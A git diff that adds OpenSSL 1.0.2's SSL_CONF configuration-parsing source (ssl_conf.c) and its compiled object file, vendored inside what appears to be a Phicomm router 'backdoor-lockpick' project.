+    unsigned long *poptions;
+    /* Pointer to SSL or SSL_CTX cert_flags or NULL if none */
+    unsigned int *pcert_flags;
+    /* Current flag table being worked on */
+    const ssl_flag_tbl *tbl;
+    /* Size of table */
+    size_t ntbl;
+};
+
+static int ssl_match_option(SSL_CONF_CTX *cctx, const ssl_flag_tbl *tbl,
+                            const char *name, int namelen, int onoff)
+{
+    /* If name not relevant for context skip */
+    if (!(cctx->flags & tbl->name_flags & SSL_TFLAG_BOTH))
+        return 0;
+    if (namelen == -1) {
+        if (strcmp(tbl->name, name))
+            return 0;
+    } else if (tbl->namelen != namelen
+               || strncasecmp(tbl->name, name, namelen))
+        return 0;
+    if (cctx->poptions) {
+        if (tbl->name_flags & SSL_TFLAG_INV)
+            onoff ^= 1;
+        if (tbl->name_flags & SSL_TFLAG_CERT) {
+            if (onoff)
+                *cctx->pcert_flags |= tbl->option_value;
+            else
+                *cctx->pcert_flags &= ~tbl->option_value;
+        } else {
+            if (onoff)
+                *cctx->poptions |= tbl->option_value;
+            else
+                *cctx->poptions &= ~tbl->option_value;
+        }
+    }
+    return 1;
+}
+
+static int ssl_set_option_list(const char *elem, int len, void *usr)
+{
+    SSL_CONF_CTX *cctx = usr;
+    size_t i;
+    const ssl_flag_tbl *tbl;
+    int onoff = 1;
+    /*
+     * len == -1 indicates not being called in list context, just for single
+     * command line switches, so don't allow +, -.
+     */
+    if (len != -1) {
+        if (*elem == '+') {
+            elem++;
+            len--;
+            onoff = 1;
+        } else if (*elem == '-') {
+            elem++;
+            len--;
+            onoff = 0;
+        }
+    }
+    for (i = 0, tbl = cctx->tbl; i < cctx->ntbl; i++, tbl++) {
+        if (ssl_match_option(cctx, tbl, elem, len, onoff))
+            return 1;
+    }
+    return 0;
+}
+
+/* Single command line switches with no argument e.g. -no_ssl3 */
+static int ctrl_str_option(SSL_CONF_CTX *cctx, const char *cmd)
+{
+    static const ssl_flag_tbl ssl_option_single[] = {
+        SSL_FLAG_TBL("no_ssl2", SSL_OP_NO_SSLv2),
+        SSL_FLAG_TBL("no_ssl3", SSL_OP_NO_SSLv3),
+        SSL_FLAG_TBL("no_tls1", SSL_OP_NO_TLSv1),
+        SSL_FLAG_TBL("no_tls1_1", SSL_OP_NO_TLSv1_1),
+        SSL_FLAG_TBL("no_tls1_2", SSL_OP_NO_TLSv1_2),
+        SSL_FLAG_TBL("bugs", SSL_OP_ALL),
+        SSL_FLAG_TBL("no_comp", SSL_OP_NO_COMPRESSION),
+        SSL_FLAG_TBL_SRV("ecdh_single", SSL_OP_SINGLE_ECDH_USE),
+#ifndef OPENSSL_NO_TLSEXT
+        SSL_FLAG_TBL("no_ticket", SSL_OP_NO_TICKET),
+#endif
+        SSL_FLAG_TBL_SRV("serverpref", SSL_OP_CIPHER_SERVER_PREFERENCE),
+        SSL_FLAG_TBL("legacy_renegotiation",
+                     SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION),
+        SSL_FLAG_TBL_SRV("legacy_server_connect",
+                         SSL_OP_LEGACY_SERVER_CONNECT),
+        SSL_FLAG_TBL_SRV("no_resumption_on_reneg",
+                         SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION),
+        SSL_FLAG_TBL_SRV_INV("no_legacy_server_connect",
+                             SSL_OP_LEGACY_SERVER_CONNECT),
+        SSL_FLAG_TBL_CERT("strict", SSL_CERT_FLAG_TLS_STRICT),
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+        SSL_FLAG_TBL_CERT("debug_broken_protocol",
+                          SSL_CERT_FLAG_BROKEN_PROTOCOL),
+#endif
+    };
+    cctx->tbl = ssl_option_single;
+    cctx->ntbl = sizeof(ssl_option_single) / sizeof(ssl_flag_tbl);
+    return ssl_set_option_list(cmd, -1, cctx);
+}
+
+/* Set supported signature algorithms */
+static int cmd_SignatureAlgorithms(SSL_CONF_CTX *cctx, const char *value)
+{
+    int rv;
+    if (cctx->ssl)
+        rv = SSL_set1_sigalgs_list(cctx->ssl, value);
+    /* NB: ctx == NULL performs syntax checking only */
+    else
+        rv = SSL_CTX_set1_sigalgs_list(cctx->ctx, value);
+    return rv > 0;
+}
+
+/* Set supported client signature algorithms */
+static int cmd_ClientSignatureAlgorithms(SSL_CONF_CTX *cctx,
+                                         const char *value)
+{
+    int rv;
+    if (cctx->ssl)
+        rv = SSL_set1_client_sigalgs_list(cctx->ssl, value);
+    /* NB: ctx == NULL performs syntax checking only */
+    else
+        rv = SSL_CTX_set1_client_sigalgs_list(cctx->ctx, value);
+    return rv > 0;
+}
+
+static int cmd_Curves(SSL_CONF_CTX *cctx, const char *value)
+{
+    int rv;
+    if (cctx->ssl)
+        rv = SSL_set1_curves_list(cctx->ssl, value);
+    /* NB: ctx == NULL performs syntax checking only */
+    else
+        rv = SSL_CTX_set1_curves_list(cctx->ctx, value);
+    return rv > 0;
+}
+
+#ifndef OPENSSL_NO_ECDH
+/* ECDH temporary parameters */
+static int cmd_ECDHParameters(SSL_CONF_CTX *cctx, const char *value)
+{
+    int onoff = -1, rv = 1;
+    if (!(cctx->flags & SSL_CONF_FLAG_SERVER))
+        return -2;
+    if (cctx->flags & SSL_CONF_FLAG_FILE) {
+        if (*value == '+') {
+            onoff = 1;
+            value++;
+        }
+        if (*value == '-') {
+            onoff = 0;
+            value++;
+        }
+        if (!strcasecmp(value, "automatic")) {
+            if (onoff == -1)
+                onoff = 1;
+        } else if (onoff != -1)
+            return 0;
+    } else if (cctx->flags & SSL_CONF_FLAG_CMDLINE) {
+        if (!strcmp(value, "auto"))
+            onoff = 1;
+    }
+
+    if (onoff != -1) {
+        if (cctx->ctx)
+            rv = SSL_CTX_set_ecdh_auto(cctx->ctx, onoff);
+        else if (cctx->ssl)
+            rv = SSL_set_ecdh_auto(cctx->ssl, onoff);
+    } else {
+        EC_KEY *ecdh;
+        int nid;
+        nid = EC_curve_nist2nid(value);
+        if (nid == NID_undef)
+            nid = OBJ_sn2nid(value);
+        if (nid == 0)
+            return 0;
+        ecdh = EC_KEY_new_by_curve_name(nid);
+        if (!ecdh)
+            return 0;
+        if (cctx->ctx)
+            rv = SSL_CTX_set_tmp_ecdh(cctx->ctx, ecdh);
+        else if (cctx->ssl)
+            rv = SSL_set_tmp_ecdh(cctx->ssl, ecdh);
+        EC_KEY_free(ecdh);
+    }
+
+    return rv > 0;
+}
+#endif
+static int cmd_CipherString(SSL_CONF_CTX *cctx, const char *value)
+{
+    int rv = 1;
+    if (cctx->ctx)
+        rv = SSL_CTX_set_cipher_list(cctx->ctx, value);
+    if (cctx->ssl)
+        rv = SSL_set_cipher_list(cctx->ssl, value);
+    return rv > 0;
+}
+
+static int cmd_Protocol(SSL_CONF_CTX *cctx, const char *value)
+{
+    static const ssl_flag_tbl ssl_protocol_list[] = {
+        SSL_FLAG_TBL_INV("ALL", SSL_OP_NO_SSL_MASK),
+        SSL_FLAG_TBL_INV("SSLv2", SSL_OP_NO_SSLv2),
+        SSL_FLAG_TBL_INV("SSLv3", SSL_OP_NO_SSLv3),
+        SSL_FLAG_TBL_INV("TLSv1", SSL_OP_NO_TLSv1),
+        SSL_FLAG_TBL_INV("TLSv1.1", SSL_OP_NO_TLSv1_1),
+        SSL_FLAG_TBL_INV("TLSv1.2", SSL_OP_NO_TLSv1_2)
+    };
+    if (!(cctx->flags & SSL_CONF_FLAG_FILE))
+        return -2;
+    cctx->tbl = ssl_protocol_list;
+    cctx->ntbl = sizeof(ssl_protocol_list) / sizeof(ssl_flag_tbl);
+    return CONF_parse_list(value, ',', 1, ssl_set_option_list, cctx);
+}
+
+static int cmd_Options(SSL_CONF_CTX *cctx, const char *value)
+{
+    static const ssl_flag_tbl ssl_option_list[] = {
+        SSL_FLAG_TBL_INV("SessionTicket", SSL_OP_NO_TICKET),
+        SSL_FLAG_TBL_INV("EmptyFragments",
+                         SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS),
+        SSL_FLAG_TBL("Bugs", SSL_OP_ALL),
+        SSL_FLAG_TBL_INV("Compression", SSL_OP_NO_COMPRESSION),
+        SSL_FLAG_TBL_SRV("ServerPreference", SSL_OP_CIPHER_SERVER_PREFERENCE),
+        SSL_FLAG_TBL_SRV("NoResumptionOnRenegotiation",
+                         SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION),
+        SSL_FLAG_TBL_SRV("DHSingle", SSL_OP_SINGLE_DH_USE),
+        SSL_FLAG_TBL_SRV("ECDHSingle", SSL_OP_SINGLE_ECDH_USE),
+        SSL_FLAG_TBL("UnsafeLegacyRenegotiation",
+                     SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION),
+    };
+    if (!(cctx->flags & SSL_CONF_FLAG_FILE))
+        return -2;
+    if (value == NULL)
+        return -3;
+    cctx->tbl = ssl_option_list;
+    cctx->ntbl = sizeof(ssl_option_list) / sizeof(ssl_flag_tbl);
+    return CONF_parse_list(value, ',', 1, ssl_set_option_list, cctx);
+}
+
+static int cmd_Certificate(SSL_CONF_CTX *cctx, const char *value)
+{
+    int rv = 1;
+    if (!(cctx->flags & SSL_CONF_FLAG_CERTIFICATE))
+        return -2;
+    if (cctx->ctx)
+        rv = SSL_CTX_use_certificate_chain_file(cctx->ctx, value);
+    if (cctx->ssl)
+        rv = SSL_use_certificate_file(cctx->ssl, value, SSL_FILETYPE_PEM);
+    return rv > 0;
+}
+
+static int cmd_PrivateKey(SSL_CONF_CTX *cctx, const char *value)
+{
+    int rv = 1;
+    if (!(cctx->flags & SSL_CONF_FLAG_CERTIFICATE))
+        return -2;
+    if (cctx->ctx)
+        rv = SSL_CTX_use_PrivateKey_file(cctx->ctx, value, SSL_FILETYPE_PEM);
+    if (cctx->ssl)
+        rv = SSL_use_PrivateKey_file(cctx->ssl, value, SSL_FILETYPE_PEM);
+    return rv > 0;
+}
+
+#ifndef OPENSSL_NO_DH
+static int cmd_DHParameters(SSL_CONF_CTX *cctx, const char *value)
+{
+    int rv = 0;
+    DH *dh = NULL;
+    BIO *in = NULL;
+    if (!(cctx->flags & SSL_CONF_FLAG_CERTIFICATE))
+        return -2;
+    if (cctx->ctx || cctx->ssl) {
+        in = BIO_new(BIO_s_file_internal());
+        if (!in)
+            goto end;
+        if (BIO_read_filename(in, value) <= 0)
+            goto end;
+        dh = PEM_read_bio_DHparams(in, NULL, NULL, NULL);
+        if (!dh)
+            goto end;
+    } else
+        return 1;
+    if (cctx->ctx)
+        rv = SSL_CTX_set_tmp_dh(cctx->ctx, dh);
+    if (cctx->ssl)
+        rv = SSL_set_tmp_dh(cctx->ssl, dh);
+ end:
+    if (dh)
+        DH_free(dh);
+    if (in)
+        BIO_free(in);
+    return rv > 0;
+}
+#endif
+typedef struct {
+    int (*cmd) (SSL_CONF_CTX *cctx, const char *value);
+    const char *str_file;
+    const char *str_cmdline;
+    unsigned int value_type;
+} ssl_conf_cmd_tbl;
+
+/* Table of supported parameters */
+
+#define SSL_CONF_CMD(name, cmdopt, type) \
+        {cmd_##name, #name, cmdopt, type}
+
+#define SSL_CONF_CMD_STRING(name, cmdopt) \
+        SSL_CONF_CMD(name, cmdopt, SSL_CONF_TYPE_STRING)
+
+static const ssl_conf_cmd_tbl ssl_conf_cmds[] = {
+    SSL_CONF_CMD_STRING(SignatureAlgorithms, "sigalgs"),
+    SSL_CONF_CMD_STRING(ClientSignatureAlgorithms, "client_sigalgs"),
+    SSL_CONF_CMD_STRING(Curves, "curves"),
+#ifndef OPENSSL_NO_ECDH
+    SSL_CONF_CMD_STRING(ECDHParameters, "named_curve"),
+#endif
+    SSL_CONF_CMD_STRING(CipherString, "cipher"),
+    SSL_CONF_CMD_STRING(Protocol, NULL),
+    SSL_CONF_CMD_STRING(Options, NULL),
+    SSL_CONF_CMD(Certificate, "cert", SSL_CONF_TYPE_FILE),
+    SSL_CONF_CMD(PrivateKey, "key", SSL_CONF_TYPE_FILE),
+#ifndef OPENSSL_NO_DH
+    SSL_CONF_CMD(DHParameters, "dhparam", SSL_CONF_TYPE_FILE)
+#endif
+};
+
+static int ssl_conf_cmd_skip_prefix(SSL_CONF_CTX *cctx, const char **pcmd)
+{
+    if (!pcmd || !*pcmd)
+        return 0;
+    /* If a prefix is set, check and skip */
+    if (cctx->prefix) {
+        if (strlen(*pcmd) <= cctx->prefixlen)
+            return 0;
+        if (cctx->flags & SSL_CONF_FLAG_CMDLINE &&
+            strncmp(*pcmd, cctx->prefix, cctx->prefixlen))
+            return 0;
+        if (cctx->flags & SSL_CONF_FLAG_FILE &&
+            strncasecmp(*pcmd, cctx->prefix, cctx->prefixlen))
+            return 0;
+        *pcmd += cctx->prefixlen;
+    } else if (cctx->flags & SSL_CONF_FLAG_CMDLINE) {
+        if (**pcmd != '-' || !(*pcmd)[1])
+            return 0;
+        *pcmd += 1;
+    }
+    return 1;
+}
+
+static const ssl_conf_cmd_tbl *ssl_conf_cmd_lookup(SSL_CONF_CTX *cctx,
+                                                   const char *cmd)
+{
+    const ssl_conf_cmd_tbl *t;
+    size_t i;
+    if (cmd == NULL)
+        return NULL;
+
+    /* Look for matching parameter name in table */
+    for (i = 0, t = ssl_conf_cmds;
+         i < sizeof(ssl_conf_cmds) / sizeof(ssl_conf_cmd_tbl); i++, t++) {
+        if (cctx->flags & SSL_CONF_FLAG_CMDLINE) {
+            if (t->str_cmdline && !strcmp(t->str_cmdline, cmd))
+                return t;
+        }
+        if (cctx->flags & SSL_CONF_FLAG_FILE) {
+            if (t->str_file && !strcasecmp(t->str_file, cmd))
+                return t;
+        }
+    }
+    return NULL;
+}
+
+int SSL_CONF_cmd(SSL_CONF_CTX *cctx, const char *cmd, const char *value)
+{
+    const ssl_conf_cmd_tbl *runcmd;
+    if (cmd == NULL) {
+        SSLerr(SSL_F_SSL_CONF_CMD, SSL_R_INVALID_NULL_CMD_NAME);
+        return 0;
+    }
+
+    if (!ssl_conf_cmd_skip_prefix(cctx, &cmd))
+        return -2;
+
+    runcmd = ssl_conf_cmd_lookup(cctx, cmd);
+
+    if (runcmd) {
+        int rv;
+        if (value == NULL)
+            return -3;
+        rv = runcmd->cmd(cctx, value);
+        if (rv > 0)
+            return 2;
+        if (rv == -2)
+            return -2;
+        if (cctx->flags & SSL_CONF_FLAG_SHOW_ERRORS) {
+            SSLerr(SSL_F_SSL_CONF_CMD, SSL_R_BAD_VALUE);
+            ERR_add_error_data(4, "cmd=", cmd, ", value=", value);
+        }
+        return 0;
+    }
+
+    if (cctx->flags & SSL_CONF_FLAG_CMDLINE) {
+        if (ctrl_str_option(cctx, cmd))
+            return 1;
+    }
+
+    if (cctx->flags & SSL_CONF_FLAG_SHOW_ERRORS) {
+        SSLerr(SSL_F_SSL_CONF_CMD, SSL_R_UNKNOWN_CMD_NAME);
+        ERR_add_error_data(2, "cmd=", cmd);
+    }
+
+    return -2;
+}
+
+int SSL_CONF_cmd_argv(SSL_CONF_CTX *cctx, int *pargc, char ***pargv)
+{
+    int rv;
+    const char *arg = NULL, *argn;
+    if (pargc && *pargc == 0)
+        return 0;
+    if (!pargc || *pargc > 0)
+        arg = **pargv;
+    if (arg == NULL)
+        return 0;
+    if (!pargc || *pargc > 1)
+        argn = (*pargv)[1];
+    else
+        argn = NULL;
+    cctx->flags &= ~SSL_CONF_FLAG_FILE;
+    cctx->flags |= SSL_CONF_FLAG_CMDLINE;
+    rv = SSL_CONF_cmd(cctx, arg, argn);
+    if (rv > 0) {
+        /* Success: update pargc, pargv */
+        (*pargv) += rv;
+        if (pargc)
+            (*pargc) -= rv;
+        return rv;
+    }
+    /* Unknown switch: indicate no arguments processed */
+    if (rv == -2)
+        return 0;
+    /* Some error occurred processing command, return fatal error */
+    if (rv == 0)
+        return -1;
+    return rv;
+}
+
+int SSL_CONF_cmd_value_type(SSL_CONF_CTX *cctx, const char *cmd)
+{
+    if (ssl_conf_cmd_skip_prefix(cctx, &cmd)) {
+        const ssl_conf_cmd_tbl *runcmd;
+        runcmd = ssl_conf_cmd_lookup(cctx, cmd);
+        if (runcmd)
+            return runcmd->value_type;
+    }
+    return SSL_CONF_TYPE_UNKNOWN;
+}
+
+SSL_CONF_CTX *SSL_CONF_CTX_new(void)
+{
+    SSL_CONF_CTX *ret;
+    ret = OPENSSL_malloc(sizeof(SSL_CONF_CTX));
+    if (ret) {
+        ret->flags = 0;
+        ret->prefix = NULL;
+        ret->prefixlen = 0;
+        ret->ssl = NULL;
+        ret->ctx = NULL;
+        ret->poptions = NULL;
+        ret->pcert_flags = NULL;
+        ret->tbl = NULL;
+        ret->ntbl = 0;
+    }
+    return ret;
+}
+
+int SSL_CONF_CTX_finish(SSL_CONF_CTX *cctx)
+{
+    return 1;
+}
+
+void SSL_CONF_CTX_free(SSL_CONF_CTX *cctx)
+{
+    if (cctx) {
+        if (cctx->prefix)
+            OPENSSL_free(cctx->prefix);
+        OPENSSL_free(cctx);
+    }
+}
+
+unsigned int SSL_CONF_CTX_set_flags(SSL_CONF_CTX *cctx, unsigned int flags)
+{
+    cctx->flags |= flags;
+    return cctx->flags;
+}
+
+unsigned int SSL_CONF_CTX_clear_flags(SSL_CONF_CTX *cctx, unsigned int flags)
+{
+    cctx->flags &= ~flags;
+    return cctx->flags;
+}
+
+int SSL_CONF_CTX_set1_prefix(SSL_CONF_CTX *cctx, const char *pre)
+{
+    char *tmp = NULL;
+    if (pre) {
+        tmp = BUF_strdup(pre);
+        if (tmp == NULL)
+            return 0;
+    }
+    if (cctx->prefix)
+        OPENSSL_free(cctx->prefix);
+    cctx->prefix = tmp;
+    if (tmp)
+        cctx->prefixlen = strlen(tmp);
+    else
+        cctx->prefixlen = 0;
+    return 1;
+}
+
+void SSL_CONF_CTX_set_ssl(SSL_CONF_CTX *cctx, SSL *ssl)
+{
+    cctx->ssl = ssl;
+    cctx->ctx = NULL;
+    if (ssl) {
+        cctx->poptions = &ssl->options;
+        cctx->pcert_flags = &ssl->cert->cert_flags;
+    } else {
+        cctx->poptions = NULL;
+        cctx->pcert_flags = NULL;
+    }
+}
+
+void SSL_CONF_CTX_set_ssl_ctx(SSL_CONF_CTX *cctx, SSL_CTX *ctx)
+{
+    cctx->ctx = ctx;
+    cctx->ssl = NULL;
+    if (ctx) {
+        cctx->poptions = &ctx->options;
+        cctx->pcert_flags = &ctx->cert->cert_flags;
+    } else {
+        cctx->poptions = NULL;
+        cctx->pcert_flags = NULL;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_conf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_conf.o
new file mode 100644
index 0000000000000000000000000000000000000000..a220637cd36e191498b7c2430c80769baf124d3c
GIT binary patch
literal 11616
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
